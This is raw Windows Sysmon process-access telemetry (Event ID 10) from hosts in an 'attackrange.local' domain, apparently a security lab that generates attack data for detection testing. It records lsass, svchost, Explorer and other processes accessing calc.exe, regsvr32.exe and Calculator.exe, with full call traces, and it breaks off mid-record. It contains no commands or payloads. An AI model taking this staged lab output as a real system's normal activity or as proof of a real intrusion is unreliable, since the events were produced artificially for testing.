22:12:49.569{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26B7-6013-1500-00000000A401}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032802Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.569{FF16AF91-26B5-6013-0B00-00000000A401}860600C:\Windows\system32\lsass.exe{FF16AF91-36E1-6013-6F03-00000000A401}5388C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032801Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.569{FF16AF91-26B5-6013-0B00-00000000A401}860600C:\Windows\system32\lsass.exe{FF16AF91-36E1-6013-6F03-00000000A401}5388C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032800Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.569{FF16AF91-26B5-6013-0B00-00000000A401}860600C:\Windows\system32\lsass.exe{FF16AF91-36E1-6013-7203-00000000A401}2076C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000361114Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.546{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+6142|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361113Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.546{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+6142|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361112Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.531{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+6131|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361111Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.531{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+6131|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361110Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.531{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000361109Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.531{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+12ce5|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361108Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.531{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+12ce5|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361107Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.531{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361106Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.531{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361105Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.515{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+310c0|C:\Windows\SYSTEM32\psmserviceexthost.dll+30dbf|C:\Windows\SYSTEM32\ntdll.dll+6ba5|C:\Windows\SYSTEM32\ntdll.dll+67f1|C:\Windows\SYSTEM32\ntdll.dll+6650|C:\Windows\SYSTEM32\ntdll.dll+305ac|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361104Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.515{8e433fbf-337b-6013-8402-000000001100}16568196C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361103Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.515{8e433fbf-337b-6013-8402-000000001100}16568196C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361102Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.515{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361101Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.499{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361100Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.499{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361099Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.499{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+25de9|C:\Windows\System32\ApplicationFrame.dll+6106|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361098Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.499{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+25de9|C:\Windows\System32\ApplicationFrame.dll+6106|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361097Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.499{8e433fbf-337a-6013-7e02-000000001100}63045600C:\Windows\system32\ctfmon.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\MSCTF.dll+328e0|C:\Windows\System32\MSCTF.dll+31adc|C:\Windows\System32\MSCTF.dll+3176f|C:\Windows\System32\MSCTF.dll+315d2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361096Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.499{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+1ca30|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000361095Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.499{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+1c8fa|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000361094Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.499{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+2aa9f|c:\windows\system32\capabilityaccessmanager.dll+1c8c2|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf 10341000x8000000000000000361093Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.499{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 